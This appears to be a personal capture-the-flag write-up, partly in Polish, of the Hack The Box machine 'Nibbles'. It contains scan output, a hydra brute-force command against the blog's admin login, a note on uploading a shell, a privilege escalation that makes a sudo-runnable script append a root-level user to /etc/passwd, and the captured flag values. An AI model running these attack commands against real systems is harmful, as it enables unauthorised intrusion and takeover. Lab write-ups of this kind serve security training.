Nibbles - 18.08.2021

NMap

┌──(kali㉿kali)-[~/htb/nibbles]
└─$ nmap -sC -sV -T4 -p- 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:20 CEST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.75
Host is up (0.054s latency).
Not shown: 65394 closed ports, 139 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nikto

┌──(kali㉿kali)-[~/htb/nibbles]                                                                                       
└─$ nikto -h 10.10.10.75 -C all                                                                                                                                                                                 
- Nikto v2.1.6                                                                                                        
---------------------------------------------------------------------------                                           
+ Target IP:          10.10.10.75
+ Target Hostname:    10.10.10.75                                                                                     
+ Target Port:        80           
+ Start Time:         2021-08-18 14:22:35 (GMT2)                                                                      
---------------------------------------------------------------------------                                           
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 5d, size: 5616c3cf7fa77, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 26470 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-08-18 14:51:51 (GMT2) (1756 seconds)

Version: v4.0.3

SearchSploit

Użytkownik

admin

SSH Enum

SSH Crack

Nieudane - zablokowano połączenie i są false-positives

hydra -l admin -P /usr/share/wordlists/rockyou.txt  10.10.10.75 -V http-form-post '/nibbleblog/admin.php:username=^USER^&password=^PASS^:F=Incorrect'

Próba creds admin:nibbles udana

Upload shell

user.txt

540e8442702197becaef617c7411eb0a

Privileges Escalation

Podejrzany plik personal.zip

Pomocna linijka

/usr/bin/script -qc /bin/bash /dev/null

Ponieważ można użyć sudo do uruchomienia montior.sh, można zmodyfikować kod programu na np.

echo mati1:pATfNCwRanDjY:0:0:mati1:/home/mati1:/bin/bash >> /etc/passw

Dodaje on nowego użytkownika, który ma uprawnienia administratora

mati1:password

Uruchamiając taki skrypt, nastepuje działanie programu

sudo ./monitor.sh

/etc/passwd

...
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
nibbler:x:1001:1001::/home/nibbler:
mati1:pATfNCwRanDjY:0:0:mati1:/home/mati1:/bin/bash

root.txt

b5510bc4e42863bddf68f2a7b0ee935e

Nibbles - 18.08.2021#

NMap#

Nikto#

SearchSploit#

Użytkownik#

SSH Enum#

SSH Crack#

Upload shell#

Privileges Escalation#